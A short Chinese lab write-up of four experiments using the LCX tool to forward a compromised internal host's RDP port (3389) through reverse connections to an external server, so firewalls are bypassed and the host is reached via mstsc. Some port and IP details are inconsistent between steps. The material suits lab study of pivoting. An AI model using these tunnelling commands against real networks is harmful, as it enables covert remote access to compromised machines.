LCX轉發實驗一
環境:內網3389端口不對外開放,但是1234端口對外開放(正向連接)
lcx .exe –tran 1234 127.0.0.1 3389
過程:192.168.1.105: 1234 -> 3389
LCX轉發實驗二
環境:內網主機可以訪問外網80端口,同時3389端口只內網訪問(反向連接)
步驟一:外網服務器開啓監聽
lcx.exe -listen 80 5555
步驟二:將被控主機端口轉發到外網服務器
lcx.exe –slave 公網 IP + 端口 被控服務器IP + 端口
lcx.exe -slave 192.168.1.102 80 127.0.0.1 3389
步驟三:在外網服務器連接本地5555端口
然後遠程桌面(mstsc) 127.0.0.1:5555
過程:本地:5555 -> 4444 -> 192.168.1.105 3389
![在這裏插入圖片描述](https://img-blog.csdnimg.cn/2020031817100882.png
LCX轉發實驗三
環境:內網主機不能訪問外網,但是可以訪問同網段的內網機器,同時3389端口只內網訪問
步驟一:外網服務器開啓監聽
lcx.exe -listen 4444 5555
步驟二:將被控主機端口轉發到外網服務器
lcx.exe –slave 公網 IP + 端口 被控服務器IP + 端口
lcx.exe -slave 192.168.203.137 4444 10.1.1.2 3389
步驟三:在外網服務器連接本地5555端口
然後mstsc 127.0.0.1:5555
過程:本地 5555 -> 4444 -> 192.168.203.138 -> 10.1.1.2 3389
LCX轉發實驗四
環境:內網主機不能訪問外網,但是可以訪問同網段的內網機器,同時3389端口只能本地訪問,但是80端口對外開放。
步驟一:被控服務器的3389端口轉發到本地的8080端口
lcx.exe -tran 8080 127.0.0.1 3389
步驟二:在能夠對外訪問的內網機器上監聽端口
lcx –listen 4444 5555
步驟三: 在內網被控服務器上連接內網能夠對外訪問的服務器
Lcx.exe –slave 192.168.203.137 4444 10.1.1.1 8080
步驟四:在外網服務器連接本地5555端口
然後mstsc 127.0.0.1:5555
過程:本地 5555 -> 4444 -> 192.168.203.138 -> 10.1.1.2 8080 -> 3389